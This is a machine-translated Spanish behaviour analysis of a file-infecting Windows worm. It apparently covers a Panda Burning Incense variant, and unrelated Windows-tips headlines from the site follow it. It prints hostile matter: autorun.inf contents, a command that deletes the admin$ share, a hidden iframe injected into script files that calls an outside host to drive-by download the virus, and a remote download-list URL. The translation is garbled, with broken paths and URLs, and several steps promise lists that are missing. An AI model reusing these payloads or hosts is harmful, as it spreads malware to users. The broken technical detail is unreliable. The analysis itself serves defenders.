5. Análisis técnico
1: después de que se ejecute el archivo de virus, cópielo en% SystemRoot% \\ system32 \\ drivers \\ nvscv32.exe
Cree un elemento de inicio automático del registro:
[HKEY_CURRENT_USER \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run \\]
nvscv32: "C: \\ Windows \\ system32 \\ drivers \\ nvscv32.exe"
2: Encuentre el reverso Formulario de virus Proceso relacionado con el fin de virus:
3: Finalice el siguiente proceso
4: Deshabilite los siguientes servicios
5: elimine la siguiente clave de registro:
6: infecte todos los archivos ejecutables y cambie el ícono a (esta vez no es el ícono del incienso de panda)
7: Omita el siguiente directorio:
< UL>
8: Eliminar * .gho archivos de copia de seguridad.
9: cree una copia del archivo. setup.exe en todos los directorios raíz de la unidad, cree un archivo autorun.inf para que el virus se ejecute automáticamente y configure los atributos del archivo como ocultos, de solo lectura y de sistema.
autorun.inf content:
[AutoRun]
OPEN = setup.exe
shellexecute = setup.exe
shell \\ Auto \\ command = setup.exe
10: Eliminar compartir: cmd.exe /c net share admin $ /del /y
11: Agregar < iframe src = http: //www.krvkr.com/a todos los archivos de script en la máquina Worm.htm width = ”0” height = ”0” > < /iframe >, esta dirección de código es un troyano de página web que explota la vulnerabilidad MS-06014, una vez que el usuario navega por la página web del servidor en el virus, si el sistema Si no lo parchea, descargará y ejecutará este virus.
12: analice las máquinas LAN y, una vez que encuentren una vulnerabilidad, se propagarán rápidamente.
13: Visite http: //www en el fondo. Whboy Net /update /wormcn. Txt, descarga otros virus según la lista de descargas.
La lista de descargas actual es la siguiente: (¡Los siguientes enlaces son todos de contenido peligroso, no haga clic!)
A este comportamiento de virus El análisis está completo.
1. ¿Qué es la política de grupo (1) ¿Cuál es el uso de la política de grupo? Cuando se trata de la
11. Barra de tareas y menú de inicio La barra de tareas y el menú de inicio se pueden usa
¿Qué es la memoria virtual? La memoria virtual es Windows XP como p
Actualizaciones automáticas Una de las salvaguardas importantes para mantener los sistemas y el soft
Falta el ícono del escritorio. Poner los problemas causados por el antivirus
Varias formas de entrar en el entorno DOS bajo XP
Deje que WinXP restaure las caras antiguas
¿Este truco? - Consola de recuperación de XP
Hablando de temas relacionados con procesadores APU
WinXP Tips - Move My Documents
Explique la aplicación del puente (1)
Ejemplo de aplicación de consola de recuperación
¡Video! Descubriendo 5 pequeños secretos que WinXP no conoce (1)
Cómo abrir la interfaz de control de sonido moderna en Win10
Consejos para que Win7 elimine el cuadro discontinuo del ícono del escritorio
Win7 sigue caliente, el 96% de las personas en el mundo usan Windows
¡WinXP también puede ir directamente a Win10! Solo confíe en una imagen ISO independiente
¿Cómo reproducir el método de entrada predeterminado en el sistema win10?
Dos buenas maneras para que los usuarios de Win7 jueguen con CF
Win8 determina cómo el tipo de inicio del sistema es UEFI o BIOS
Win7 preinstalado mejora Win10, el sistema de respaldo reinstalar Win10 no se puede activar solución
¿Cuál es la diferencia entre actualizar la instalación y la personalización al instalar Windows 7
Cómo eliminar correctamente una cuenta con derechos de administrador